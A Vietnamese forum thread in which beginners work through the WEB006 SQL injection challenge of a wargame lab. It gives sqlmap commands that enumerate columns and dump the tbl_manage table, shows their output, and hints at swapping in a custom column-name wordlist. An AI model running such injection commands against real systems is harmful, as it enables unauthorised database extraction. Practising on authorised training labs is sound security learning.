Giúp mình bài WEB006 với?

[vlong0595]

Mình thấy nó lỗi sql injection. tìm tất cả các bảng mà chẳng thấy flag đâu cả -_-.

 

Gợi ý: flag trong bảng 'tbl_manage' bạn nhé. :-$

 

Mình cũng đọc gợi ý này rồi. Chỉ là lúc tìm trong bảng đấy mình thấy mỗi tên thôi mà nhỉ @@.

 

Database: db_profile
Table: tbl_manage
[1 entry]
+----+-----+-------+
| id | age | uname |
+----+-----+-------+
| 1 | 17 | Tony |
+----+-----+-------+

Đây là những gì mình tìm được trong bảng tbl_manage

 

Gợi ý tiếp theo: những cột mà bạn tìm được ở bảng trên không có flag, bạn tìm thêm cột khác nhé. :3:

 

Bảng tbl_manage còn có cột khác à bạn.
sqlmap -u http://lab10.wargame.whitehat.vn/web006/index.php?id=1 -D db_profile -T tbl_manage --columns
Mình dùng lệnh này thì không thấy cột nào nữa.

 

Gợi ý tiếp theo: bạn tải file đính kèm mình gửi ở dưới, giải nén ra được file common-columns.txt thì chép đè vào thư mục chứa sqlmap có cấu trúc đại loại như là: sqlmap xtcommon-columns.txt (nhớ backup file nếu cần) sau đó dùng sqlmap khai thác lại thử nhé.


View attachment common-columns.zip

 

Gợi ý giúp mình là do mình viết lệnh thiếu hay do điều gì vậy. Mình mới tìm hiểu CTF có gì giúp mình với.
Thanks bạn vì những gợi ý nhé.

 

Gợi ý giúp mình là do mình viết lệnh thiếu hay do điều gì vậy. Mình mới tìm hiểu CTF có gì giúp mình với.
Thanks bạn vì những gợi ý nhé.

sqlmap -u [URL]http://lab10.wargame.whitehat.vn/web006/index.php?id=1[/URL] -D db_profile -T tbl_manage --columns

Câu lệnh trên của bạn là để tìm các cột. Để tìm được flag bạn cần làm theo hướng dẫn ở #7 của mình sau dump dữ liệu bằng câu lệnh:

sqlmap.py -u http://lab10.wargame.whitehat.vn/web006/index.php?id=1  -D db_profile -T tbl_manage --dump

P/s: mình cũng mới tìm hiểu thôi.

 

ax. Do bản sqlmap hay sao vậy. Mình dump hoài mà nó không hiện flag nên mới thấy lạ. Copy nguyên câu lệnh của bạn thì chỉ ra bảng như trên ấy.
Database: db_profile
Table: tbl_manage
[1 entry]
+----+-----+-------+
| id | age | uname |
+----+-----+-------+
| 1 | 17 | Tony |
+----+-----+-------+

Cái này có được là do dump rồi @@.
Bạn chụp cho mình cái hình được không.
P/s: Mình dùng linux.

 

Mình làm toàn bị thông báo lỗi này

[22:46:37] [ERROR] unable to retrieve the number of columns for table 'tbl_manage' in database 'db_profile'
[22:46:37] [WARNING] unable to retrieve column names for table 'tbl_manage' in database 'db_profile'

 

À ok rồi. Dùng bảng columm của bạn là được. Sao bạn biết thêm flag vào trong đấy hay vậy?

 

À ok rồi. Dùng bảng columm của bạn là được. Sao bạn biết thêm flag vào trong đấy hay vậy?

Mình đoán và thêm thử thì tìm được flag nên hướng dẫn bạn như thế thôi chớ có gì hay đâu. >

 

Mình thấy nó lỗi sql injection. tìm tất cả các bảng mà chẳng thấy flag đâu cả -_-.

 

Mình thấy nó lỗi sql injection. tìm tất cả các bảng mà chẳng thấy flag đâu cả -_-.

Bạn xem lại topic này từ trên xuống, xem từng gợi ý của mình và làm thử, nếu không được thì xem gợi ý tiếp theo, xem hết gợi ý sẽ tìm được flag nhé. :">